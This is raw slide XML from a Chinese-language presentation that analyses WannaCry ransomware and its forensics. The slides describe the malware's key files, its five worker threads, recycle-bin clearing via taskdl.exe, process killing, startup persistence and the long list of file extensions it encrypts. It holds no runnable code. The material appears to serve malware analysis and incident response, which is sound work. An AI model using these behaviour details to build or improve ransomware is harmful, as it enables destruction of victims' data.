          <a:xfrm>
            <a:off x="538735" y="2249669"/>
            <a:ext cx="39068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如果已经加密过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则创建一个线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>做三件事情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B1F3EC-0641-44CA-8358-4ADD8FBB5836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1002684" y="4122270"/>
            <a:ext cx="11510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更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>c.wncy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113944242-929947585.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F60298D-16E9-49B7-A4E7-D63C9469B9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84" y="1347082"/>
            <a:ext cx="6406281" cy="493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866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B1F3EC-0641-44CA-8358-4ADD8FBB5836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475296" y="1692074"/>
            <a:ext cx="4775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启动 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>@WanaDecryptor@.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528113956248-539668486.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418F4361-7EC0-4F1E-A04E-D2B8D0635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0" y="2590522"/>
            <a:ext cx="9513817" cy="390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543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B1F3EC-0641-44CA-8358-4ADD8FBB5836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475296" y="1692074"/>
            <a:ext cx="4775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设置启动项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114014139-889657282.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0FF4FA-AB03-4554-8C7D-066782FE06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3" y="2857321"/>
            <a:ext cx="10595143" cy="3205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273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B1F3EC-0641-44CA-8358-4ADD8FBB5836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411896" y="2308666"/>
            <a:ext cx="109234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如果没有加密过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>初始化秘钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.pky, 00000000.eky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生成一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字节的随机数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114025115-281949729.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35AB617-5132-48C1-94F2-47B7EB568C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96" y="3539973"/>
            <a:ext cx="9894091" cy="1203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213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14FDC-753F-43EF-A165-F1965B31DA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441248" y="1112318"/>
            <a:ext cx="9894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接着创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个线程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒 更新全局时间标记 循环写入数据到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.res,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包括上面生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字节的随机数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114038046-375078038.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5C8534-B897-4B7F-AD1E-0CCD1FF6C2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3" y="2841368"/>
            <a:ext cx="4635176" cy="31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s://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114043280-1039104872.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D371F253-A690-4286-81FF-6A855733DE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87" y="2682705"/>
            <a:ext cx="7246497" cy="3173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330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14FDC-753F-43EF-A165-F1965B31DA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441248" y="1112318"/>
            <a:ext cx="9894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线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.dky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>00000000.pky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是否存在，以及密钥是否配对，是则设置全局标志，然后退出线程。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114058851-688905263.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E272D0C0-A20D-48C0-8C65-C59C19D38B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37" y="2584715"/>
            <a:ext cx="9492045" cy="3160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77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三、事故环境取证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如图所示，弹出软件主菜单。点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"Local"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>项右侧向右箭头，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Partition→To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> Image"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>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C27BCD-7662-48C4-9103-C60B7260FE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302" y="742260"/>
            <a:ext cx="7212563" cy="5676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5887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14FDC-753F-43EF-A165-F1965B31DA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441249" y="1112318"/>
            <a:ext cx="9082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线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒检测磁盘盘符是否发生变化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果发生变化 则开启线程 加密新磁盘的文件 。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114112928-544418443.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D46FDD1-741E-4207-A152-C2CD12B0F8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49" y="1943315"/>
            <a:ext cx="7439310" cy="4944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829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14FDC-753F-43EF-A165-F1965B31DA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441249" y="1112318"/>
            <a:ext cx="9082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线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒 运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>taskdl.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>清除所有磁盘的回收站文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和 判断已加密完成的做一样工作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451221" y="2660094"/>
            <a:ext cx="7327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创建快捷方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>生成提示文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>枚举文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为加密做准备</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114134485-1025727044.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471D60A9-1764-4A5A-89CE-11DCF4969F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429000"/>
            <a:ext cx="8941469" cy="2667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899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14FDC-753F-43EF-A165-F1965B31DA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698310" y="2447166"/>
            <a:ext cx="9082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强制结束相关进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>防止加密时文件被占用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114144059-1529138407.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{209A1808-34F9-400E-AF01-B76C429FB8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70" y="3152805"/>
            <a:ext cx="8785389" cy="180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883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1011058" y="32606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遍历文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114153693-199148799.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CAAF917-4E16-439F-975E-D6FB1427FF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3" y="1239417"/>
            <a:ext cx="8284881" cy="518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311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1011058" y="32606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判断文件类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114203846-633035612.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5430B235-6050-4941-87D5-FDB51226F9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02" y="281721"/>
            <a:ext cx="7943164" cy="6418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877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2360238" y="791637"/>
            <a:ext cx="88557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会加密以下文件类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>File_Type_A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.doc .docx .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .xlsx .ppt .pptx .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pst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ost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .msg .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>eml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vsd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vsdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .txt .csv .rtf .123 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .wk1 .pdf .dwg  .onetoc2 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>snt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .jpeg .jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0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703201-D944-4C36-8D49-33F513FE70CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2383266"/>
            <a:ext cx="117275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File_Type_B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>docb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docm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .dot .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dotm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dotx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xlsm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xlsb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xlw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xlt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xlc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xltx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xltm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pptm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .pot .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ppsm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ppsx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ppam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potx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potm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edb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hwp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .602 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sxi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sti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sldx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sldm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sldm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vdi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vmdk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vmx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>gpg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aes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .ARC .PAQ .bz2 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tbk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bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .tar .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tgz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gz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .7z .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .zip .backup .iso .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .bmp .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>png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.gif .raw  .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cgm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tif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .tiff .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nef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psd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .ai .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>svg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djvu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .m4u .m3u .mid .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wma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flv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .3g2 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>mkv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .3gp </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.mp4 .mov .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>avi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asf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .mpeg .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .mpg .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wmv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fla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swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .wav .mp3 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .class .jar .java .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .asp </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.php .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>jsp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brd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .sch .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .dip .pl .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>vb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vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .ps1 .bat .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cmd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js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asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .h .pas .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cpp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .c .cs .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>suo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sln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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ldf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mdf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ibd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myi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myd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frm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odb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dbf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mdb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accdb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sql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sqlitedb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .sqlite3 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .lay6 .lay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
